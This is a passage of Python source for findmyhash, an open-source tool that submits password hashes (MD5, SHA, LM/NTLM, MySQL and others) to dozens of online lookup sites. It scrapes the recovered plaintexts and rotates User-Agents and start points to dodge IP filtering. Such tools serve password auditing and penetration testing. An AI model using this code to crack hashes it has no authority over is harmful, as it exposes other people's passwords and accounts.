def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5hashcracker.appspot.com/crack"
# Build the parameters
params = { "query" : hashvalue,
"submit" : "Crack" }
# Make the firt request
response = do_HTTP_request ( url, params )
# Build the second URL
url = "http://md5hashcracker.appspot.com/status"
# Make the second request
response = do_HTTP_request ( url )
# Analyze the response
if response:
html = response.read()
else:
return None
match = search (r'<td id="cra[^"]*">not cracked</td>', html)
if not match:
match = search (r'<td id="cra[^"]*">cracked</td>', html)
regexp = r'<td id="pla_' + match.group().split('"')[1][4:] + '">[^<]*</td>'
match2 = search (regexp, html)
if match2:
return match2.group().split('>')[1][:-4]
else:
return None
class PASSCRACKING:
name = "passcracking"
url = "http://passcracking.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://passcracking.com/index.php"
# Build the parameters
boundary = "-----------------------------" + str(randint(1000000000000000000000000000,9999999999999999999999999999))
params = [ '--' + boundary,
'Content-Disposition: form-data; name="admin"',
'',
'false',
'--' + boundary,
'Content-Disposition: form-data; name="admin2"',
'',
'77.php',
'--' + boundary,
'Content-Disposition: form-data; name="datafromuser"',
'',
'%s' % (hashvalue) ,
'--' + boundary + '--', '' ]
body = '\r\n'.join(params)
# Build the headers
headers = { "Content-Type" : "multipart/form-data; boundary=%s" % (boundary),
"Content-length" : len(body) }
# Make the request
request = urllib2.Request ( url )
request.add_header ( "Content-Type", "multipart/form-data; boundary=%s" % (boundary) )
request.add_header ( "Content-length", len(body) )
request.add_data(body)
try:
response = urllib2.urlopen(request)
except:
return None
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<td>md5 Database</td><td>[^<]*</td><td bgcolor=.FF0000>[^<]*</td>', html)
if match:
return match.group().split('>')[5][:-4]
else:
return None
class ASKCHECK:
name = "askcheck"
url = "http://askcheck.com"
supported_algorithm = [MD4, MD5, SHA1, SHA256]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://askcheck.com/reverse?reverse=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'Reverse value of [^\s]* hash <a[^<]*</a> is <a[^>]*>[^<]*</a>', html)
if match:
return match.group().split('>')[3][:-3]
else:
return None
class FOX21:
name = "fox21"
url = "http://cracker.fox21.at"
supported_algorithm = [MD5, LM, NTLM]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
hash2 = None
if alg in [LM, NTLM] and ':' in hashvalue:
if alg == LM:
hash2 = hashvalue.split(':')[0]
else:
hash2 = hashvalue.split(':')[1]
else:
hash2 = hashvalue
# Build the URL
url = "http://cracker.fox21.at/api.php?a=check&h=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
xml = None
if response:
try:
doc = parseDoc ( response.read() )
except:
print "INFO: You need libxml2 to use this plugin."
return None
else:
return None
result = doc.xpathEval("//hash/@plaintext")
if result:
return result[0].content
else:
return None
class NICENAMECREW:
name = "nicenamecrew"
url = "http://crackfoo.nicenamecrew.com"
supported_algorithm = [MD5, SHA1, LM]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
hash2 = None
if alg in [LM] and ':' in hashvalue:
hash2 = hashvalue.split(':')[0]
else:
hash2 = hashvalue
# Build the URL
url = "http://crackfoo.nicenamecrew.com/?t=%s" % (alg)
# Build the parameters
params = { "q" : hash2,
"sa" : "Crack" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'The decrypted version of [^\s]* is:<br><strong>[^<]*</strong>', html)
if match:
return match.group().split('strong>')[1][:-2].strip()
else:
return None
class JOOMLAAA:
name = "joomlaaa"
url = "http://joomlaaa.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://joomlaaa.com/component/option,com_md5/Itemid,31/"
# Build the parameters
params = { "md5" : hashvalue,
"decode" : "Submit" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r"<td class='title1'>not available</td>", html)
if not match:
match2 = findall (r"<td class='title1'>[^<]*</td>", html)
return match2[1].split('>')[1][:-4]
else:
return None
class MD5_LOOKUP:
name = "md5-lookup"
url = "http://md5-lookup.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5-lookup.com/livesearch.php?q=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<td width="250">[^<]*</td>', html)
if match:
return match.group().split('>')[1][:-4]
else:
return None
class SHA1_LOOKUP:
name = "sha1-lookup"
url = "http://sha1-lookup.com"
supported_algorithm = [SHA1]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://sha1-lookup.com/livesearch.php?q=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<td width="250">[^<]*</td>', html)
if match:
return match.group().split('>')[1][:-4]
else:
return None
class SHA256_LOOKUP:
name = "sha256-lookup"
url = "http://sha-256.sha1-lookup.com"
supported_algorithm = [SHA256]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://sha-256.sha1-lookup.com/livesearch.php?q=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<td width="250">[^<]*</td>', html)
if match:
return match.group().split('>')[1][:-4]
else:
return None
class RIPEMD160_LOOKUP:
name = "ripemd-lookup"
url = "http://www.ripemd-lookup.com"
supported_algorithm = [RIPEMD]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://www.ripemd-lookup.com/livesearch.php?q=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<td width="250">[^<]*</td>', html)
if match:
return match.group().split('>')[1][:-4]
else:
return None
class MD5_COM_CN:
name = "md5.com.cn"
url = "http://md5.com.cn"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.com.cn/md5reverse"
# Build the parameters
params = { "md" : hashvalue,
"submit" : "MD5 Crack" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<b style="color:red;">[^<]*</b><br/><span', html)
if match:
return match.group().split('>')[1][:-3]
else:
return None
class DIGITALSUN:
name = "digitalsun.pl"
url = "http://md5.digitalsun.pl"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.digitalsun.pl/"
# Build the parameters
params = { "hash" : hashvalue }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<b>[^<]*</b> == [^<]*<br>\s*<br>', html)
if match:
return match.group().split('b>')[1][:-2]
else:
return None
class DRASEN:
name = "drasen.net"
url = "http://md5.drasen.net"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.drasen.net/search.php?query=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'Hash: [^<]*<br />Plain: [^<]*<br />', html)
if match:
return match.group().split('<br />')[1][7:]
else:
return None
class MYINFOSEC:
name = "myinfosec"
url = "http://md5.myinfosec.net"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.myinfosec.net/md5.php"
# Build the parameters
params = { "md5hash" : hashvalue }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<center></center>[^<]*<font color=green>[^<]*</font><br></center>', html)
if match:
return match.group().split('>')[3][:-6]
else:
return None
class MD5_NET:
name = "md5.net"
url = "http://md5.net"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://www.md5.net/cracker.php"
# Build the parameters
params = { "hash" : hashvalue }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<input type="text" id="hash" size="32" value="[^"]*"/>', html)
if match:
return match.group().split('"')[7]
else:
return None
class NOISETTE:
name = "noisette.ch"
url = "http://md5.noisette.ch"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.noisette.ch/index.php"
# Build the parameters
params = { "hash" : hashvalue }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<p>String to hash : <input name="text" value="[^"]+"/>', html)
if match:
return match.group().split('"')[3]
else:
return None
class MD5HOOD:
name = "md5hood"
url = "http://md5hood.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5hood.com/index.php/cracker/crack"
# Build the parameters
params = { "md5" : hashvalue,
"submit" : "Go" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<div class="result_true">[^<]*</div>', html)
if match:
return match.group().split('>')[1][:-5]
else:
return None
class STRINGFUNCTION:
name = "stringfunction"
url = "http://www.stringfunction.com"
supported_algorithm = [MD5, SHA1]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = ""
if alg == MD5:
url = "http://www.stringfunction.com/md5-decrypter.html"
else:
url = "http://www.stringfunction.com/sha1-decrypter.html"
# Build the parameters
params = { "string" : hashvalue,
"submit" : "Decrypt",
"result" : "" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<textarea class="textarea-input-tool-b" rows="10" cols="50" name="result"[^>]*>[^<]+</textarea>', html)
if match:
return match.group().split('>')[1][:-10]
else:
return None
class XANADREL:
name = "99k.org"
url = "http://xanadrel.99k.org"
supported_algorithm = [MD4, MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://xanadrel.99k.org/hashes/index.php?k=search"
# Build the parameters
params = { "hash" : hashvalue,
"search" : "ok" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<p>Hash : [^<]*<br />Type : [^<]*<br />Plain : "[^"]*"<br />', html)
if match:
return match.group().split('"')[1]
else:
return None
class SANS:
name = "sans"
url = "http://isc.sans.edu"
supported_algorithm = [MD5, SHA1]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://isc.sans.edu/tools/reversehash.html"
# Build the Headers with a random User-Agent
headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
# Build the parameters
response = do_HTTP_request ( url, httpheaders=headers )
html = None
if response:
html = response.read()
else:
return None
match = search (r'<input type="hidden" name="token" value="[^"]*" />', html)
token = ""
if match:
token = match.group().split('"')[5]
else:
return None
params = { "token" : token,
"text" : hashvalue,
"word" : "",
"submit" : "Submit" }
# Build the Headers with the Referer header
headers["Referer"] = "http://isc.sans.edu/tools/reversehash.html"
# Make the request
response = do_HTTP_request ( url, params, headers )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'... hash [^\s]* = [^\s]*\s*</p><br />', html)
if match:
print "hola mundo"
return match.group().split('=')[1][:-10].strip()
else:
return None
class BOKEHMAN:
name = "bokehman"
url = "http://bokehman.com"
supported_algorithm = [MD4, MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://bokehman.com/cracker/"
# Build the parameters from the main page
response = do_HTTP_request ( url )
html = None
if response:
html = response.read()
else:
return None
match = search (r'<input type="hidden" name="PHPSESSID" id="PHPSESSID" value="[^"]*" />', html)
phpsessnid = ""
if match:
phpsessnid = match.group().split('"')[7]
else:
return None
match = search (r'<input type="hidden" name="key" id="key" value="[^"]*" />', html)
key = ""
if match:
key = match.group().split('"')[7]
else:
return None
params = { "md5" : hashvalue,
"PHPSESSID" : phpsessnid,
"key" : key,
"crack" : "Try to crack it" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<tr><td>[^<]*</td><td>[^<]*</td><td>[^s]*seconds</td></tr>', html)
if match:
return match.group().split('td>')[1][:-2]
else:
return None
class GOOG_LI:
name = "goog.li"
url = "http://goog.li"
supported_algorithm = [MD5, MYSQL, SHA1, SHA224, SHA384, SHA256, SHA512, RIPEMD, NTLM, GOST, WHIRLPOOL, LDAP_MD5, LDAP_SHA1]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
hash2 = None
if alg in [NTLM] and ':' in hashvalue:
hash2 = hashvalue.split(':')[1]
else:
hash2 = hashvalue
# Confirm the initial '*' character
if alg == MYSQL and hash2[0] != '*':
hash2 = '*' + hash2
# Build the URL
url = "http://goog.li/?q=%s" % (hash2)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<br />cleartext[^:]*: [^<]*<br />', html)
if match:
return match.group().split(':')[1].strip()[:-6]
else:
return None
class WHREPORITORY:
name = "Windows Hashes Repository"
url = "http://nediam.com.mx"
supported_algorithm = [LM, NTLM]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
hash2 = None
if ':' in hashvalue:
if alg == LM:
hash2 = hashvalue.split(':')[0]
else:
hash2 = hashvalue.split(':')[1]
else:
hash2 = hashvalue
# Build the URL, parameters and headers
url = ""
params = None
headers = None
if alg == LM:
url = "http://nediam.com.mx/winhashes/search_lm_hash.php"
params = { "lm" : hash2,
"btn_go" : "Search" }
headers = { "Referer" : "http://nediam.com.mx/winhashes/search_lm_hash.php" }
else:
url = "http://nediam.com.mx/winhashes/search_nt_hash.php"
params = { "nt" : hash2,
"btn_go" : "Search" }
headers = { "Referer" : "http://nediam.com.mx/winhashes/search_nt_hash.php" }
# Make the request
response = do_HTTP_request ( url, params, headers )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<tr><td align="right">PASSWORD</td><td>[^<]*</td></tr>', html)
if match:
return match.group().split(':')[1]
else:
return None
CRAKERS = [ SCHWETT,
NETMD5CRACK,
MD5_CRACKER,
BENRAMSEY,
GROMWEB,
HASHCRACKING,
VICTOROV,
THEKAINE,
TMTO,
REDNOIZE,
MD5_DB,
MY_ADDR,
MD5PASS,
MD5DECRYPTION,
MD5CRACK,
MD5ONLINE,
MD5_DECRYPTER,
AUTHSECUMD5,
HASHCRACK,
OPHCRACK,
C0LLISION,
CMD5,
AUTHSECUCISCO7,
CACIN,
IBEAST,
PASSWORD_DECRYPT,
BIGTRAPEZE,
HASHCHECKER,
MD5HASHCRACKER,
PASSCRACKING,
ASKCHECK,
FOX21,
NICENAMECREW,
JOOMLAAA,
MD5_LOOKUP,
SHA1_LOOKUP,
SHA256_LOOKUP,
RIPEMD160_LOOKUP,
MD5_COM_CN,
DIGITALSUN,
DRASEN,
MYINFOSEC,
MD5_NET,
NOISETTE,
MD5HOOD,
STRINGFUNCTION,
XANADREL,
SANS,
BOKEHMAN,
GOOG_LI,
WHREPORITORY ]
########################################################################################################
### GENERAL METHODS
########################################################################################################
def configureCookieProcessor (cookiefile='/tmp/searchmyhash.cookie'):
'''Set a Cookie Handler to accept cookies from the different Web sites.
@param cookiefile Path of the cookie store.'''
cookieHandler = LWPCookieJar()
if cookieHandler is not None:
if path.isfile (cookiefile):
cookieHandler.load (cookiefile)
opener = urllib2.build_opener ( urllib2.HTTPCookieProcessor(cookieHandler) )
urllib2.install_opener (opener)
def do_HTTP_request (url, params={}, httpheaders={}):
'''
Send a GET or POST HTTP Request.
@return: HTTP Response
'''
data = {}
request = None
# If there is parameters, they are been encoded
if params:
data = urlencode(params)
request = urllib2.Request ( url, data, headers=httpheaders )
else:
request = urllib2.Request ( url, headers=httpheaders )
# Send the request
try:
response = urllib2.urlopen (request)
except:
return ""
return response
def printSyntax ():
"""Print application syntax."""
print """%s 1.1.2 ( http://code.google.com/p/findmyhash/ )
Usage:
------
python %s <algorithm> OPTIONS
Accepted algorithms are:
------------------------
MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded
NOTE: for LM / NTLM it is recommended to introduce both values with this format:
python %s LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7
python %s NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7
Valid OPTIONS are:
------------------
-h <hash_value> If you only want to crack one hash, specify its value with this option.
-f <file> If you have several hashes, you can specify a file with one hash per line.
NOTE: All of them have to be the same type.
-g If your hash cannot be cracked, search it in Google and show all the results.
NOTE: This option ONLY works with -h (one hash input) option.
Examples:
---------
-> Try to crack only one hash.
python %s MD5 -h 098f6bcd4621d373cade4e832627b4f6
-> Try to crack a JUNIPER encrypted password escaping special characters.
python %s JUNIPER -h "\$9\$LbHX-wg4Z"
-> If the hash cannot be cracked, it will be searched in Google.
python %s LDAP_SHA1 -h "{SHA}cRDtpNCeBiql5KOQsKVyrA0sAiA=" -g
-> Try to crack multiple hashes using a file (one hash per line).
python %s MYSQL -f mysqlhashesfile.txt
Contact:
--------
[Web] http://laxmarcaellugar.blogspot.com/
[Mail/Google+] [email protected]
[twitter] @laXmarcaellugar
""" % ( (sys.argv[0],) * 8 )
def crackHash (algorithm, hashvalue=None, hashfile=None):
"""Crack a hash or all the hashes of a file.
@param alg Algorithm of the hash (MD5, SHA1...).
@param hashvalue Hash value to be cracked.
@param hashfile Path of the hash file.
@return If the hash has been cracked or not."""
global CRAKERS
# Cracked hashes will be stored here
crackedhashes = []
# Is the hash cracked?
cracked = False
# Only one of the two possible inputs can be setted.
if (not hashvalue and not hashfile) or (hashvalue and hashfile):
return False
# hashestocrack depends on the input value
hashestocrack = None
if hashvalue:
hashestocrack = [ hashvalue ]
else:
try:
hashestocrack = open (hashfile, "r")
except:
print "\nIt is not possible to read input file (%s)\n" % (hashfile)
return cracked
# Try to crack all the hashes...
for activehash in hashestocrack:
hashresults = []
# Standarize the hash
activehash = activehash.strip()
if algorithm not in [JUNIPER, LDAP_MD5, LDAP_SHA1]:
activehash = activehash.lower()
# Initial message
print "\nCracking hash: %s\n" % (activehash)
# Each loop starts for a different start point to try to avoid IP filtered
begin = randint(0, len(CRAKERS)-1)
for i in range(len(CRAKERS)):
# Select the cracker
cr = CRAKERS[ (i+begin)%len(CRAKERS) ]()
# Check if the cracker support the algorithm
if not cr.isSupported ( algorithm ):
continue
# Analyze the hash
print "Analyzing with %s (%s)..." % (cr.name, cr.url)
# Crack the hash
result = None
try:
result = cr.crack ( activehash, algorithm )
# If it was some trouble, exit
except:
print "\nSomething was wrong. Please, contact with us to report the bug:\n\[email protected]\n"
if hashfile:
try:
hashestocrack.close()
except:
pass
return False
# If there is any result...
cracked = 0
if result:
# If it is a hashlib supported algorithm...
if algorithm in [MD4, MD5, SHA1, SHA224, SHA384, SHA256, SHA512, RIPEMD]:
# Hash value is calculated to compare with cracker result
h = hashlib.new (algorithm)
h.update (result)
# If the calculated hash is the same to cracker result, the result is correct (finish!)
if h.hexdigest() == activehash:
hashresults.append (result)
cracked = 2
# If it is a half-supported hashlib algorithm
elif algorithm in [LDAP_MD5, LDAP_SHA1]:
alg = algorithm.split('_')[1]
ahash = decodestring ( activehash.split('}')[1] )
# Hash value is calculated to compare with cracker result
h = hashlib.new (alg)
h.update (result)
# If the calculated hash is the same to cracker result, the result is correct (finish!)
if h.digest() == ahash:
hashresults.append (result)
cracked = 2
# If it is a NTLM hash
elif algorithm == NTLM or (algorithm == LM and ':' in activehash):
# NTLM Hash value is calculated to compare with cracker result
candidate = hashlib.new('md4', result.split()[-1].encode('utf-16le')).hexdigest()
# It's a LM:NTLM combination or a single NTLM hash
if (':' in activehash and candidate == activehash.split(':')[1]) or (':' not in activehash and candidate == activehash):
hashresults.append (result)
cracked = 2
# If it is another algorithm, we search in all the crackers
else:
hashresults.append (result)
cracked = 1
# Had the hash cracked?
if cracked:
print "\n***** HASH CRACKED!! *****\nThe original string is: %s\n" % (result)
# If result was verified, break
if cracked == 2:
break
else:
print "... hash not found in %s\n" % (cr.name)
# Store the result/s for later...
if hashresults:
# With some hash types, it is possible to have more than one result,
# Repited results are deleted and a single string is constructed.
resultlist = []
for r in hashresults:
#if r.split()[-1] not in resultlist:
#resultlist.append (r.split()[-1])
if r not in resultlist:
resultlist.append (r)
finalresult = ""
if len(resultlist) > 1:
finalresult = ', '.join (resultlist)
else:
finalresult = resultlist[0]
# Valid results are stored
crackedhashes.append ( (activehash, finalresult) )
# Loop is finished. File can need to be closed
if hashfile:
try:
hashestocrack.close ()
except:
pass
# Show a resume of all the cracked hashes
print "\nThe following hashes were cracked:\n----------------------------------\n"
print crackedhashes and "\n".join ("%s -> %s" % (hashvalue, result.strip()) for hashvalue, result in crackedhashes) or "NO HASH WAS CRACKED."
print
return cracked
def searchHash (hashvalue):
'''Google the hash value looking for any result which could give some clue...
@param hashvalue The hash is been looking for.'''
start = 0
finished = False
results = []
sys.stdout.write("\nThe hash wasn't found in any database. Maybe Google has any idea...\nLooking for results...")
sys.stdout.flush()
while not finished:
sys.stdout.write('.')
sys.stdout.flush()
# Build the URL
url = "http://www.google.com/search?hl=en&q=%s&filter=0" % (hashvalue)
if start:
url += "&start=%d" % (start)
# Build the Headers with a random User-Agent
headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
# Send the request
response = do_HTTP_request ( url, httpheaders=headers )
# Extract the results ...
html = None
if response:
html = response.read()
else:
continue
resultlist = findall (r'<a href="[^"]*?" class=l', html)
# ... saving only new ones
new = False
for r in resultlist:
url_r = r.split('"')[1]
if not url_r in results:
results.append (url_r)
new = True
start += len(resultlist)
# If there is no a new result, finish
if not new:
finished = True
# Show the results
if results:
print "\n\nGoogle has some results. Maybe you would like to check them manually:\n"
results.sort()
for r in results:
print " *> %s" % (r)
print
else:
print "\n\nGoogle doesn't have any result. Sorry!\n"
########################################################################################################
### MAIN CODE
########################################################################################################
def main():
"""Main method."""
###################################################
# Syntax check
if len (sys.argv) < 4:
printSyntax()
sys.exit(1)
else:
try:
opts, args = getopt.getopt (sys.argv[2:], "gh:f:")
except:
printSyntax()
sys.exit(1)
###################################################
# Load input parameters
algorithm = sys.argv[1].lower()
hashvalue = None
hashfile = None
googlesearch = False
for opt, arg in opts:
if opt == '-h':
hashvalue = arg
elif opt == '-f':
hashfile = arg
else:
googlesearch = True
###################################################
# Configure the Cookie Handler
configureCookieProcessor()
# Initialize PRNG seed
seed()
cracked = 0
###################################################
# Crack the hash/es
